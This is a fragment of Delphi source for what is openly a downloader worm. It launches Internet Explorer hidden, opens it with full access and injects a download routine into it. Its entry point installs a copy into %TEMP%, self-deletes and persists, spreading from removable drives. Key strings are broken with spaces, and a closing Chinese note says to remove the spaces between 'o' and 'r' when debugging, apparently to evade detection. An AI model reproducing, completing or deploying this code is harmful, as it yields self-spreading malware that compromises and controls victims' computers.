  else // inject into iexplore.exe
  begin
    //createProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
    winexec(PChar('C:Program FilesInternet Explo rerIEXPLo rE.EXE'), sw_hide);
    sleep(500);
    GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
    // open the process
    ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
    Inject(ProcessHandle, @Download);
    // close the handle
    CloseHandle(ProcessHandle);
    //sleep(500);
    //ExtDelMe;
  end;
end;

// Entry point. exefile becomes <Temp>ExeName (separator lost in rendering). When the
// running file is anything else — e.g. the copy on a removable drive — setme installs
// it into %TEMP%, launches that copy and self-deletes; when the running file already
// is the %TEMP% copy, AutoAndw0rM persists, spreads and downloads.
begin
  exefile := Pchar(GetDirecto ry(2) + ExeName);
  if CompareText(ParamStr(0), exefile) <> 0 then
    setme
  else
  begin
    AutoAndw0rM;
  // ExitProcess(0);
  end;
end.

调试的时候把o r中间的空格去掉

